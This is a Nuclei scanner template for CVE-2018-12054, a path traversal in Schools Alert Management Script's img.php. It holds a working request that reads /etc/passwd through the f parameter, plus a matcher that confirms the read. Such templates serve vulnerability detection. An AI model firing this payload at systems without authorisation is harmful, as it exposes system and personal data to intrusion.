nuclei-templates/http/cves/2018/CVE-2018-12054.yaml

46 lines
1.8 KiB
YAML

id: CVE-2018-12054
info:
name: Schools Alert Management Script - Arbitrary File Read
author: wisnupramoedya
severity: high
description: Schools Alert Management Script is susceptible to an arbitrary file read vulnerability via the f parameter in img.php, aka absolute path traversal.
impact: |
This vulnerability can lead to unauthorized access to sensitive information stored on the system, potentially exposing personal data of students, staff, and other stakeholders.
remediation: |
Apply the latest patch or update provided by the vendor to fix the arbitrary file read vulnerability in the Schools Alert Management Script.
reference:
- https://www.exploit-db.com/exploits/44874
- https://nvd.nist.gov/vuln/detail/CVE-2018-12054
- https://github.com/unh3x/just4cve/issues/4
- https://www.exploit-db.com/exploits/44874/
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-12054
cwe-id: CWE-22
epss-score: 0.32403
epss-percentile: 0.97019
cpe: cpe:2.3:a:schools_alert_management_script_project:schools_alert_management_script:-:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: schools_alert_management_script_project
product: schools_alert_management_script
tags: cve,cve2018,lfi,edb,schools_alert_management_script_project
http:
- method: GET
path:
- "{{BaseURL}}/img.php?f=/./etc/./passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4a0a00473045022100909d49cf51c1283f77ba2b94390ec551a381726ad24bc74122062cdf6ef9d80d02206aa868f2e0d240bebc71f4ce6fca02e97592a2b0c377d466545fb0b3d1cb715d:922c64590222798bb761d5b6d8e72950